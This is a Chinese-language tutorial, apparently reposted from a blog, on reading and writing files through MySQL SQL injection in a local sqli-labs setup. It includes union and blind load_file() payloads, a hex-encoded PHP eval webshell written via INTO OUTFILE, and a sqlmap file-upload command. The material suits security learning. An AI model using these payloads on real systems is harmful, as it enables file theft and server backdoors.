secure_file_priv對讀寫檔案的影響:
secure_file_priv在mysql的my.ini中設定,用來限制 load_file()、into outfile、into dumpfile 函式在哪個目錄下擁有上傳或者讀取檔案的權限,secure_file_priv的值默認為NULL,即不允許匯入匯出,
sql注入檔案讀寫方式:
load_file() :讀取指定檔案
LOAD DATA LOCAL INFILE:讀取指定檔案[當secure_file_priv為null時可以代替load_file()]
into outfile :將查詢的資料寫入檔案中
into dumpfile:將查詢的資料寫入檔案中 (只能寫入一行資料)
sqlmap: --file-write 要寫入的檔案 --file-dest 寫入的絕對路徑
查看secure_file_priv設定狀態
show global variables like 'secure%';
限制mysqld 不允許匯入/匯出:secure_file_priv=null (默認)
限制mysqld 的匯入/匯出 只能發生在/tmp/目錄下:secure_file_priv=/tmp/
不對mysqld 的匯入/匯出做限制:secure_file_priv=''
當secure_file_priv=''時:
load_file()讀本地檔案:
union注入讀取本地檔案
http://127.0.0.1/mysql/Less-1/?id=-1' union select 1,2,load_file('c:/users/91839/desktop/2.txt') --+
也可以把檔案名轉換成16進制
http://127.0.0.1/mysql/Less-1/?id=-1' union select 1,2,load_file(0x633A2F75736572732F39313833392F6465736B746F702F312E747874) --+
利用盲注讀取,然后用二分法一個一個的判斷字符
其中2.txt第一個字符為c,按照ascii碼對照表對應為99
http://127.0.0.1/mysql/Less-1/?id=1' and ascii(mid((select (load_file('c:/users/91839/desktop/2.txt'))),1,1))>98 --+
http://127.0.0.1/mysql/Less-1/?id=1' and ascii(mid((select (load_file('c:/users/91839/desktop/2.txt'))),1,1))>99 --+
同樣也可以用時間盲注,用同樣的方式手工把表名和列名讀出來
into outfile/into dumpfile:將查詢的資料寫入檔案中
(into dumpfile只能寫入一行資料)
利用union注入寫入一句話木馬 into outfile 和 into dumpfile 都可以
http://127.0.0.1/mysql/Less-1/?id=-1' union select 1,2,'一句話' into outfile 'c:/users/91839/desktop/10.txt' --+
照樣可以將一句話木馬轉換成16進制
http://127.0.0.1/mysql/Less-1/?id=-1' union select 1,2,0x3C3F70687020406576616C28245F504F53545B6361726E5D293B3F3E into outfile 'c:/users/91839/desktop/200.txt' --+
--file-write --file-dest:利用sqlmap寫入檔案
在sqlmap中,如果寫的權限,知道絕對路徑,并且secure_file_priv為空就可以寫入檔案
利用sqlmap將本地檔案寫入靶機的c:/users/91839/desktop/shell.txt
python3 sqlmap.py -u "http://127.0.0.1/mysql/Less-1/?id=1" --random-agent --risk 3 --file-write "shell.txt" --file-dest "c:/users/91839/desktop/shell.txt"
當secure_file_priv=null時:
LOAD DATA LOCAL INFILE
LOAD DATA LOCAL INFILE與load_file都是讀取本地檔案,load_file只能在secure_file_priv為空時讀取,而LOAD DATA LOCAL INFILE不受限制,所以當secure_file_priv 的值為 NULL的時候可以用LOAD DATA LOCAL INFILE來充當load_file的效果
drop table mysql.m1; //先洗掉掉這個表
CREATE TABLE mysql.m1 (code TEXT ); //然后創建
LOAD DATA LOCAL INFILE 'c:/users/91839/desktop/1.txt' INTO TABLE mysql.m1 fields terminated by ''; //讀取檔案
select * from mysql.m1; //查看檔案
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/285638.html
標籤:其他
上一篇:DVWA - 操作手冊
下一篇:sql注入